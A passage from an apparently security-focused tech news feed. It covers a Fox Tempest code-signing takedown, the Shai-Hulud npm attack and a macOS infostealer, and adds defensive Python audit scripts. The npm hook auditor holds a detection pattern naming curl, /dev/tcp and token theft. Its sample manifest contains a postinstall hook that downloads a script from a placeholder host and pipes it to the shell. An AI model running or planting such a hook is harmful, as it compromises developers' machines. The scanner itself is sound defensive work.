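# npm runs these hooks automatically during `npm install`, with the installing user's
# privileges. A hijacked release that puts a credential stealer here executes on every
# machine and CI runner that installs it.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Command fragments that rarely belong in an install hook. Illustrative assumption for
# this example, not a vendor rule set; tune it for your own dependency tree.
RISKY = re.compile(
    r"(curl|wget|Invoke-WebRequest|node\s+-e|eval\(|base64\s+(-d|--decode)|"
    r"\.npmrc|GITHUB_TOKEN|NPM_TOKEN|AWS_SECRET|\.ssh/|/dev/tcp/)",
    re.I,
)


def audit_manifest(path: str, manifest: dict) -> list:
    """One record per install hook in the manifest, flagged when its command looks risky."""
    findings = []
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not isinstance(cmd, str):
            continue
        hit = RISKY.search(cmd)
        findings.append({
            "package": f"{manifest.get('name', '?')}@{manifest.get('version', '?')}",
            "path": path,
            "hook": hook,
            "command": cmd,
            "risky": hit is not None,
            "matched": hit.group(0) if hit else None,
        })
    return findings


def iter_manifests(root: str) -> Iterator:
    """Yield (path, manifest) for every package.json below root, e.g. ./node_modules."""
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            path = os.path.join(dirpath, "package.json")
            try:
                with open(path, encoding="utf-8") as fh:
                    yield path, json.load(fh)
            except (OSError, ValueError):
                continue   # unreadable or malformed manifest; skip rather than abort


def scan(manifests: Iterable) -> dict:
    """Summarise all install hooks found and the subset that matched a risky pattern."""
    hooks = [f for path, manifest in manifests for f in audit_manifest(path, manifest)]
    return {"hooks_total": len(hooks), "risky": [f for f in hooks if f["risky"]]}


# Constructed manifests standing in for node_modules/*/package.json. Both package names
# are made up: one legitimate native build step, one hijacked release whose postinstall
# fetches and runs a second stage.
SAMPLE_MANIFESTS = [
    ("node_modules/fast-hasher/package.json", {
        "name": "fast-hasher", "version": "2.0.1",
        "scripts": {"install": "node-gyp rebuild"},
    }),
    ("node_modules/left-padz/package.json", {
        "name": "left-padz", "version": "1.3.2",
        "scripts": {
            "postinstall": "node -e \"require('child_process').exec('curl -s https://example.invalid/s | sh')\"",
            "test": "jest",
        },
    }),
]

if __name__ == "__main__":
    source = iter_manifests("node_modules") if os.path.isdir("node_modules") else SAMPLE_MANIFESTS
    report = scan(source)
    for f in report["risky"]:
        print(f"RISKY {f['package']} {f['hook']}: {f['command']}  (matched {f['matched']!r})")
    print(f"{len(report['risky'])} risky of {report['hooks_total']} install hooks")
```

<p>Run it from a project root after a fresh install to get a review list rather than a verdict; a native module's build step is a legitimate install hook, which is why the script reports every hook and only marks the suspicious ones. Pair it with <code>npm ci --ignore-scripts</code> where the build allows it, so hooks cannot run at all, and with pinned versions so a hijacked release is not picked up automatically.</p>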
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Why our national sovereignty depends on cyber resilience ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/why-our-national-sovereignty-depends-on-cyber-resilience</link>
                                                                            <description>
                            <![CDATA[ Shared cyber resiliency is an imperative for our wider national sovereignty and security. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">hjDasepng7GjNMtGmwyaFH</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/GwfBA5FJJWQSsrqCuLz3gL-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 21 May 2026 10:44:27 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Mike Sewart ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/GwfBA5FJJWQSsrqCuLz3gL-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A portion of the globe with countries lit up by their lights at night, and with dotted lights criss-crossing the image connecting the countries]]></media:description>                                                            <media:text><![CDATA[A portion of the globe with countries lit up by their lights at night, and with dotted lights criss-crossing the image connecting the countries]]></media:text>
                                <media:title type="plain"><![CDATA[A portion of the globe with countries lit up by their lights at night, and with dotted lights criss-crossing the image connecting the countries]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/GwfBA5FJJWQSsrqCuLz3gL-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
<p>From our energy infrastructure through to the systems responsible for our telecommunications, transport and utilities, a core set of services is essential to keeping our society running.</p><p>World events have rightly put Britain’s defense capabilities under renewed attention, but our national sovereignty is maintained as much by the cyber resiliency of these critical systems as by nuclear deterrents, submarines and physical military hardware.</p><p>Operational Technology (OT) systems control power generation, transmission, distribution and gas transport safely and reliably. The increasing digitization and interconnection of these systems is creating cyber risk, whether from the exploitation of unpatched vulnerabilities, phishing, or <a href="https://www.techradar.com/best/best-malware-removal">malware</a>. </p><p>Such attacks, launched by nation-state groups or by criminals acting as their proxies, are among the most significant threats to the industry, because their aim is to trigger knock-on effects and cause severe disruption to everyday life.</p><p>A combination of internal gaps in strategy, <a href="https://www.techradar.com/best/best-online-cyber-security-courses">cybersecurity</a> capabilities and outdated technology is leaving our energy grid vulnerable. Once inside, many of these actors aim to persist and maintain a presence, learning and capturing as much information as they can over time without being detected.</p><p>Automation is on their side, lowering the barrier to entry for opportunistic and commercially motivated groups while accelerating the adaptation and evolution of malware. 
There are also risks with AI as it becomes embedded into enterprises.</p><p>Thales’ recent Data Threat Report, for example, found that 61% of organizations globally rank AI as their top data security threat, as these automated systems are increasingly granted broad access to enterprise data.  </p><h2 id="operational-simulation-to-validate-cyber-resilience">Operational simulation to validate cyber resilience</h2><p>The scale and frequency of these risks underscore the importance of planning and simulating responses in as much detail as possible, and to this end digital twins have become an increasingly popular tool across industrial sectors.</p><p>Fed with <a href="https://www.techradar.com/best/best-data-recovery-software">data</a> gathered from the target environment, a digital twin is a high-fidelity digital representation of a real object or process.</p><p>It is here that cyber risk must be considered alongside engineering and operational risk, with governance frameworks that ensure cybersecurity supports wider safety and operational security.</p><p>As part of the validation, leaders also need to ensure that personnel can respond safely and effectively during incidents.</p><p>By working in a sandboxed environment, <a href="https://www.techradar.com/news/best-internet-security-suites">security</a> teams responsible for critical energy networks can model attacks, from ransomware outbreaks to insider threats, without risking downtime or data loss.</p><p>Because networks never stand still, testing and validation must be ongoing if security controls are to remain effective. New assets are deployed, systems are upgraded and operational requirements change; resilience has to be maintained continuously through all of it. 
</p><p>Going a level further, the operators of power grids, rail networks and water suppliers often manage their digital and physical assets independently.</p><p>If these various digital twins can be integrated, decision makers gain a shared, simulated, real-time model of the entire system, allowing for impact analysis should a problem emerge. </p><h2 id="a-unified-national-response-to-cyberattacks">A unified national response to cyberattacks</h2><p>Adequately addressing cyber risk to critical <a href="https://www.techradar.com/best/best-infrastructure-management-service">infrastructure</a> also requires a cultural shift in how these organizations handle the data about the attacks they face. </p><p>Because confidentiality and secrecy take priority, that data is often hoarded within the organization that collected it, leaving each sector to deal with problems in isolation.</p><p>Threat actors know this and are keen to exploit it; after all, threats do not respect organizational boundaries. They move at machine speed, while defense often moves at the speed of bureaucracy.</p><p>Whether it succeeded or not, each unreported attack is a missed opportunity to refine security strategies, share knowledge and enhance the overall resilience of the sector. 
Critical national infrastructure operators and suppliers must collaborate closely to identify and close these security blind spots.</p><h2 id="from-information-silos-to-networked-intelligence">From information silos to networked intelligence</h2><p>Building and sharing more of these capabilities across sectors puts us in a position where, if a new malware signature is detected by one utility company, everyone else, from transport to defense and energy, can be protected against that threat almost immediately.</p><p>Mandated incident reporting, as the UK Government proposes for high-risk sectors and essential infrastructure, is a welcome move in the right direction.</p><p>Ofgem, the UK’s energy regulator, has meanwhile strengthened its expectations around cyber resilience, shifting its emphasis from compliance to demonstrable operational capability and preparedness.</p><p>At CYBERUK this year, we talked a lot about how no single sector can meet this challenge in isolation. Critical infrastructure, public services and private enterprises alike are connected by digital ecosystems, and by the cyber risks that come with them. </p><p>Building shared resiliency into critical infrastructure is an imperative for our wider national sovereignty and security. It will take structural changes, from proactive security measures through to cultural shifts, to ensure our cyber expertise is up to the task of meeting what lies ahead.</p><p><a href="https://www.techradar.com/best/best-encryption-software"><em>We've featured the best encryption software.</em></a></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadarPro or Future plc. 
If you are interested in contributing find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Microsoft takes down 'Fox Tempest' cybercrime service which used legitimate platforms to hide dangerous malware ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/microsoft-takes-down-fox-tempest-cybercrime-service-which-used-legitimate-platforms-to-hide-dangerous-malware</link>
                                                                            <description>
                            <![CDATA[ Fox Tempest created more than a thousand fake certificates, helping distribute Lumma, Vidar, and countless other malware. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">dh2VEdkuw25daubKqERQBj</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/7DtE9RCVmUtmH2FAfvxsvM-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 20 May 2026 16:30:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/7DtE9RCVmUtmH2FAfvxsvM-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:description>                                                            <media:text><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:text>
                                <media:title type="plain"><![CDATA[Malware attack virus alert , malicious software infection , cyber security awareness training to protect business]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/7DtE9RCVmUtmH2FAfvxsvM-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>Microsoft disrupts Fox Tempest operation which abused Azure Artifact Signing to issue fraudulent code‑signing certificates</strong></li><li><strong>The group created over 1,000 certificates and hundreds of Azure tenants, enabling malware campaigns to bypass security controls</strong></li><li><strong>Legal action was launched against Fox Tempest and Vanilla Tempest, whose services supported major malware and ransomware distribution</strong></li></ul><p>Microsoft has taken down a malicious service that supplied code-signing certificates to cybercriminals, and has launched a legal case against the operation’s perpetrators.</p><p>In its <a href="https://www.microsoft.com/en-us/security/blog/2026/05/19/exposing-fox-tempest-a-malware-signing-service-operation/" target="_blank" rel="nofollow">report</a> the company said a threat actor known as Fox Tempest used Azure Artifact Signing to obtain short-lived certificates. Malware signed with them carried a valid signature issued through Microsoft's own signing service, so it passed the checks that flag or block unsigned binaries and went on to compromise victim devices.</p><p>To access the service, the operators allegedly used identities stolen from people in the United States and Canada. To minimize the chances of being spotted, they relied on certificates that were valid for only 72 hours; over the course of the operation, however, they created more than 1,000 certificates, as well as hundreds of <a href="https://www.techradar.com/reviews/microsoft-azure" target="_blank">Azure</a> tenants and subscriptions.</p><h2 id="high-profile-customers">High-profile customers</h2><p>"Fox Tempest has created over a thousand certificates and established hundreds of Azure tenants and subscriptions to support its operations. 
Microsoft has revoked over one thousand code signing certificates attributed to Fox Tempest," Microsoft said in the report.</p><p>"In May 2026, Microsoft's Digital Crimes Unit (DCU), with support from industry partners, disrupted Fox Tempest's MSaaS offering, targeting the infrastructure and access model that enables its broader criminal use."</p><p>MSaaS here is Microsoft's shorthand for malware signing as a service. As part of the takedown effort, Microsoft seized the signspace[dot]com domain, as well as hundreds of virtual machines. It also blocked access to the infrastructure that hosted the entire service.</p><p><a href="https://www.bleepingcomputer.com/news/security/cybercrime-service-disrupted-for-abusing-microsoft-platform-to-sign-malware/" target="_blank"><em>BleepingComputer</em></a> notes that some of the biggest <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a> and ransomware campaigns used Fox Tempest’s services, including LummaStealer, Vidar, Qilin, BlackByte, and Akira. Vanilla Tempest, which allegedly distributed both malware and ransomware, was named as a co-conspirator in the legal action. </p><p>Some of the fake apps distributed this way impersonated Teams, AnyDesk, and Webex.</p><p>"When unsuspecting victims executed the falsely named Microsoft Teams installer files, those files delivered a malicious loader, which in turn installed the fraudulently signed Oyster malware and ultimately deployed Rhysida ransomware," Microsoft explained. </p><p>“Because the Oyster malware was signed by a certificate from Microsoft's Artifact Signing service, the Windows operating system initially recognized the malware as legitimate software, when it would otherwise be flagged as suspicious or blocked entirely by security controls in the Windows operating system."</p><p>The practical lesson is that a signature which validates shows only that the issuing service vouched for the signer's identity at the time of issuance, not that the code is benign: the subject named on the certificate, and whether it matches the publisher the installer claims to come from, still has to be checked. Now that Microsoft has revoked the certificates, the same binaries fail a revocation check, but they validated cleanly while the certificates were live.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Mini Shai-Hulud hackers publish over 600 compromised npm packages — developers warned to be on their guard ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/mini-shai-halud-hackers-publish-over-600-compromised-npm-packages-developers-warned-to-be-on-their-guard</link>
                                                                            <description>
                            <![CDATA[ The Shai-Hulud campaign continues, now affecting hundreds of new packages and potentially compromising thousands of projects. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">KqAQQ5WFNCieg2bLvDvYWN</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/egLHa7RH89opTZtTLW95wE-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Wed, 20 May 2026 15:35:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/egLHa7RH89opTZtTLW95wE-1280-80.jpg">
                                                            <media:credit><![CDATA[null]]></media:credit>
                                                                                                                                                                                                                                                                                                                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/egLHa7RH89opTZtTLW95wE-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>More than 600 malicious npm package versions were published in a coordinated supply‑chain attack linked to TeamPCP’s Shai‑Hulud campaign</strong></li><li><strong>The attackers compromised ecosystems including TanStack, Mistral, and antv, introducing infostealers and persistence mechanisms in developer environments</strong></li><li><strong>Developers are advised to roll back to safe versions released before May 18 and rotate any exposed credentials</strong></li></ul><p>Cybercriminals published more than 600 malicious package versions to the npm registry in a coordinated software supply-chain attack linked to the Shai-Hulud campaign.</p><p>Multiple security organizations, including Socket, confirmed that on May 19 2026, in the space of one hour, the attackers published 639 versions of 323 unique packages on npm, targeting software developers, open-source maintainers, organizations running CI/CD pipelines, and anyone else who downloaded or depends on the compromised packages. </p><p>Shai-Hulud is a <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a> campaign conducted by a threat actor known as TeamPCP. 
By stealing login credentials and access tokens, the attackers take over legitimate packages and publish new versions carrying infostealer malware; that malware harvests further credentials and compromises CI/CD environments, which is what lets the campaign spread from one maintainer to the next.</p><h2 id="major-downstream-risk">Major downstream risk</h2><p>So far, TeamPCP has compromised an undisclosed number of npm packages, but at least some of them belong to the TanStack- and Mistral-related ecosystems, and <a href="https://www.techradar.com/pro/security/openai-confirms-security-breach-in-tanstack-supply-chain-attack-but-says-no-user-data-was-affected" target="_blank">OpenAI</a> is one of the companies that has confirmed exposure as a result of the Shai-Hulud campaign.</p><p>In the latest wave, the threat actors targeted the antv ecosystem, and stolen credentials were then used to automatically create thousands of GitHub repositories. The campaign also introduced fake package provenance signatures, and new persistence mechanisms targeting VS Code and Claude Code environments.</p><p>The report does not say how many times the malicious package versions were actually downloaded, but it does stress the normal popularity of some affected packages. For example, the jest-canvas-mock package gets around 10 million monthly downloads, which suggests the attack surface is extremely large.</p><p>Security researchers stressed that the full impact of the campaign is not yet known, mostly because the number of downstream infections is unknown. Supply-chain attacks like this one are particularly dangerous because a single compromised maintainer account can affect thousands of projects through automated package updates. 
</p><p>Developers who installed the infected versions should remove them or roll back to safe versions published before May 18, and rotate any potentially exposed credentials, since the infostealer's purpose is to capture tokens that would let the attackers return.</p><p><em>Via </em><a href="https://www.bleepingcomputer.com/news/security/new-shai-hulud-malware-wave-compromises-600-npm-packages/" target="_blank"><em>BleepingComputer</em></a></p>
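<p>As an added example, not code from TechRadar, Socket, BleepingComputer or the npm project, the following Python script turns the May 18 cutoff above into a check a developer can run: it walks a package-lock.json (including nested node_modules trees and scoped packages), looks up when each installed version was published, flags anything published on or after the cutoff, and suggests the newest earlier version to roll back to. The registry's per-package time map, which <code>npm view jest-canvas-mock time --json</code> returns for that package, is replaced here by a constructed dict with invented package names, versions and dates so the script runs offline.</p>

```python
"""Audit a package-lock.json for versions published on or after a cutoff date.

Added example, not code from TechRadar, Socket or the npm project. Real use
needs the registry's per-package "time" map (what `npm view PACKAGE time --json`
returns); here that lookup is replaced by a constructed dict so the script
runs offline. Package names, versions and timestamps are invented.
"""
import json
from datetime import datetime, timezone

# Versions published on or after this instant are treated as untrusted
# ("safe versions published before May 18").
CUTOFF = datetime(2026, 5, 18, tzinfo=timezone.utc)

# Constructed package-lock.json (lockfileVersion 3 layout).
SAMPLE_LOCKFILE = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/example-canvas-mock": {"version": "2.5.3"},
        "node_modules/example-utils": {"version": "4.1.0"},
        "node_modules/example-utils/node_modules/nested-dep": {"version": "0.9.1"},
    },
})

# Constructed stand-in for `npm view PACKAGE time --json`, keyed by package name.
SAMPLE_REGISTRY_TIME = {
    "example-canvas-mock": {
        "created": "2021-03-02T10:00:00.000Z",
        "modified": "2026-05-19T14:03:21.000Z",
        "2.5.2": "2025-11-04T09:12:00.000Z",
        "2.5.3": "2026-05-19T14:03:21.000Z",  # inside the attack window
    },
    "example-utils": {"4.1.0": "2025-08-20T08:00:00.000Z"},
    "nested-dep": {"0.9.1": "2026-05-19T14:05:00.000Z"},  # no earlier version at all
}


def package_name(lock_key):
    """Map a lockfile 'packages' key to its package name, keeping scopes:
    'node_modules/a/node_modules/@scope/b' -> '@scope/b'."""
    return lock_key.rsplit("node_modules/", 1)[-1]


def installed_versions(lockfile_text):
    """Yield (name, version) for every installed package in a v2/v3 lockfile,
    including nested node_modules trees."""
    for key, entry in json.loads(lockfile_text).get("packages", {}).items():
        if key:  # the empty key is the root project itself
            yield package_name(key), entry["version"]


def parse_iso(ts):
    """Registry timestamps are ISO 8601 with a trailing Z; make them tz-aware."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def last_safe_version(times, cutoff):
    """Newest version published strictly before the cutoff, or None."""
    safe = [(parse_iso(t), v) for v, t in times.items()
            if v not in ("created", "modified") and parse_iso(t) < cutoff]
    return max(safe)[1] if safe else None


def audit(lockfile_text, registry_time, cutoff=CUTOFF):
    """Return one finding per installed version that was published on/after
    the cutoff, or whose publish time could not be established."""
    findings = []
    for name, version in installed_versions(lockfile_text):
        times = registry_time.get(name, {})
        published = times.get(version)
        if published is None:
            findings.append({"package": name, "version": version,
                             "reason": "no publish time available", "rollback_to": None})
        elif parse_iso(published) >= cutoff:
            findings.append({"package": name, "version": version,
                             "published": published,
                             "rollback_to": last_safe_version(times, cutoff)})
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_LOCKFILE, SAMPLE_REGISTRY_TIME):
        print(finding)
```

<p>Against a real project, replace SAMPLE_REGISTRY_TIME with the time map fetched for each package in the lockfile. A finding whose rollback_to is None means no version from before the cutoff exists, so the dependency should be removed rather than downgraded, and any token the compromised build had access to should be rotated regardless of what the audit reports.</p>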
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Mac users beware — this devious new infostealer malware disguises itself as official Apple tools to lure in victims ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/mac-users-beware-this-devious-new-infostealer-malware-disguises-itself-as-official-apple-tools-to-lure-in-victims</link>
                                                                            <description>
                            <![CDATA[ SentinelOne found a new variant of the SHub macOS infostealer called Reaper. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">kW8S8uBYsidJsBLr2no79k</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/o3U2t4BxoC8wMpEHpLqKMd-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 19 May 2026 10:00:53 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/o3U2t4BxoC8wMpEHpLqKMd-1280-80.jpg">
                                                            <media:credit><![CDATA[Berat Bozkurt on Unsplash]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[The menu bar running in macOS.]]></media:description>                                                            <media:text><![CDATA[The menu bar running in macOS.]]></media:text>
                                <media:title type="plain"><![CDATA[The menu bar running in macOS.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/o3U2t4BxoC8wMpEHpLqKMd-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>SentinelOne uncovers new SHub macOS infostealer variant dubbed Reaper, spread via typosquatted WeChat and Miro domains</strong></li><li><strong>The malware disguises itself with fake Apple and Google update components, establishing persistence and backdoor access</strong></li><li><strong>Reaper targets browser credentials, crypto wallets, password managers, and sensitive documents, with signs of Russian‑speaking operators avoiding CIS systems</strong></li></ul><p>Cybersecurity researchers from SentinelOne have discovered a new variant of the SHub macOS infostealer, called ‘Reaper’.</p><p>In a new <a href="https://www.sentinelone.com/blog/shub-reaper-macos-stealer-spoofs-apple-google-and-microsoft-in-a-single-attack-chain/" target="_blank">report</a>, SentinelOne said it observed typosquatted domains spoofing the popular apps WeChat (a Chinese messaging and social media app) and Miro (an online visual collaboration and whiteboard platform).</p><p>Victims using <a href="https://www.techradar.com/news/computing/apple/mac-buyer-s-guide-2015-1295725" target="_blank">macOS</a> who try to install these apps from those domains trigger an infection chain that changes its disguise at every stage to make the <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a> look legitimate. Once the victim runs the installer script, it displays a fake update message referencing Apple’s XProtectRemediator security tool, and after infecting the system it establishes persistence by creating files and folders designed to look like a genuine Google software update component. 
</p><h2 id="avoiding-the-russians">Avoiding the Russians</h2><p>It stores a backdoor in a fake “GoogleUpdate” directory and registers a LaunchAgent named “com.google.keystone.agent.plist,” the researchers said. That is the same file name the genuine Google Keystone updater uses for its LaunchAgent, so the label alone does not distinguish the backdoor from the real thing; the path of the program the agent launches, and whether that binary carries Google's code signature, do.</p><p>The goal of the campaign is to steal credentials and sensitive files, as well as cryptocurrency wallets. While SentinelOne does not attribute the attack to any specific group or threat actor, it did say there were several hints that the operators may be Russian speaking (or are, at least, trying to avoid targets in former Soviet states). </p><p>The malware checks whether the infected system uses Russian input sources and exits if it detects a system in the CIS (Commonwealth of Independent States) region. SentinelOne also said that when its researchers tried to bypass the malware’s anti-analysis protection, a fake website displayed a Russian “Access Denied” message. </p><p>The Reaper variant primarily targets web browsers, cryptocurrency wallets, and applications that may contain financial or business-related data, stealing browser credentials, crypto wallet data, login keychains, Telegram session data, and documents from the Desktop and Documents folders.</p><p>It also searches for browser extensions linked to password managers such as 1Password, Bitwarden, and LastPass, along with cryptocurrency wallets like MetaMask and Phantom.</p>
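<p>As an added example, not SentinelOne's or Google's code, the following Python check targets the persistence trick described above: it parses LaunchAgent plists and, for any job carrying a com.google.keystone label, tests whether the program it launches actually lives under Google's Keystone install location. The assumption, which the article does not state, is that the genuine agent runs from ~/Library/Google/GoogleSoftwareUpdate/ for per-user installs or /Library/Google/GoogleSoftwareUpdate/ for system installs; the plists, the user name and the fake "GoogleUpdate" path are constructed samples.</p>

```python
"""Flag LaunchAgents that borrow Google Keystone's label but launch from elsewhere.

Added example, not SentinelOne's or Google's code. Assumption (not from the
article): the genuine Keystone agent runs from under
~/Library/Google/GoogleSoftwareUpdate/ (per-user) or
/Library/Google/GoogleSoftwareUpdate/ (system-wide). The plists below are
constructed with plistlib so the check runs offline on any platform.
"""
import glob
import os
import plistlib
import re

KEYSTONE_LABEL = re.compile(r"^com\.google\.keystone\.")
KEYSTONE_DIR = "/Library/Google/GoogleSoftwareUpdate/"  # assumed genuine location


def program_path(job):
    """Executable launchd will start: 'Program' wins over ProgramArguments[0]."""
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else None


def is_genuine_keystone_path(path, home):
    """True only if the executable sits inside the user or system Keystone dir."""
    if path.startswith("~/"):
        path = home + path[1:]
    return path.startswith(home + KEYSTONE_DIR) or path.startswith(KEYSTONE_DIR)


def classify(plist_bytes, home="/Users/alice"):
    """Return 'ignore' (not a Keystone label), 'ok' or 'suspect' for one plist."""
    job = plistlib.loads(plist_bytes)
    if not KEYSTONE_LABEL.match(job.get("Label", "")):
        return "ignore"
    exe = program_path(job)
    if exe is None or not is_genuine_keystone_path(exe, home):
        return "suspect"
    return "ok"


def scan_launch_agents(home=os.path.expanduser("~")):
    """Classify every LaunchAgent plist of the current user (real-world entry point)."""
    results = {}
    for path in glob.glob(os.path.join(home, "Library", "LaunchAgents", "*.plist")):
        with open(path, "rb") as fh:
            try:
                results[path] = classify(fh.read(), home)
            except plistlib.InvalidFileException:
                results[path] = "unparseable"
    return results


# Constructed samples (not real files from an infected host).
GENUINE_PLIST = plistlib.dumps({
    "Label": "com.google.keystone.agent",
    "ProgramArguments": [
        "/Users/alice/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/"
        "Contents/Helpers/GoogleSoftwareUpdateAgent.app/Contents/MacOS/GoogleSoftwareUpdateAgent",
        "-runMode", "ifneeded",
    ],
    "RunAtLoad": True,
})

# Same label as the genuine agent, but the program lives in an invented
# "GoogleUpdate" directory, mirroring the impersonation the article describes.
FAKE_PLIST = plistlib.dumps({
    "Label": "com.google.keystone.agent",
    "ProgramArguments": ["~/Library/Application Support/GoogleUpdate/GoogleUpdate"],
    "RunAtLoad": True,
    "KeepAlive": True,
})

UNRELATED_PLIST = plistlib.dumps({
    "Label": "com.example.backup",
    "Program": "/usr/local/bin/backup",
})

if __name__ == "__main__":
    for name, blob in [("genuine", GENUINE_PLIST), ("fake", FAKE_PLIST), ("unrelated", UNRELATED_PLIST)]:
        print(name, classify(blob))
```

<p>On a real Mac, scan_launch_agents() applies the same classification to ~/Library/LaunchAgents. A path check is only a cheap first filter: a 'suspect' hit should be confirmed, and an 'ok' result should not be taken on trust, by running <code>codesign -dv --verbose=4</code> on the program path and checking that the TeamIdentifier it prints belongs to Google, since an attacker who can write into the genuine directory would pass the path test alone.</p>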
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ This devious Android malware has returned disguised as TikTok or streaming apps — and is now using blockchain to remain undetected ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/this-devious-android-malware-has-returned-disguised-as-tiktok-or-streaming-apps-and-is-now-using-blockchain-to-remain-undetected</link>
                                                                            <description>
                            <![CDATA[ A fake TikTok app is actually a banking trojan enabling credential theft and wire fraud. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">GzPqouc6JbueJLDC254SYm</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/eVgzzXmQMEyvzfYvAaAMrX-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Tue, 12 May 2026 18:20:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/eVgzzXmQMEyvzfYvAaAMrX-1280-80.jpg">
                                                            <media:credit><![CDATA[wk1003mike / Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Trojan]]></media:description>                                                            <media:text><![CDATA[Trojan]]></media:text>
                                <media:title type="plain"><![CDATA[Trojan]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/eVgzzXmQMEyvzfYvAaAMrX-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
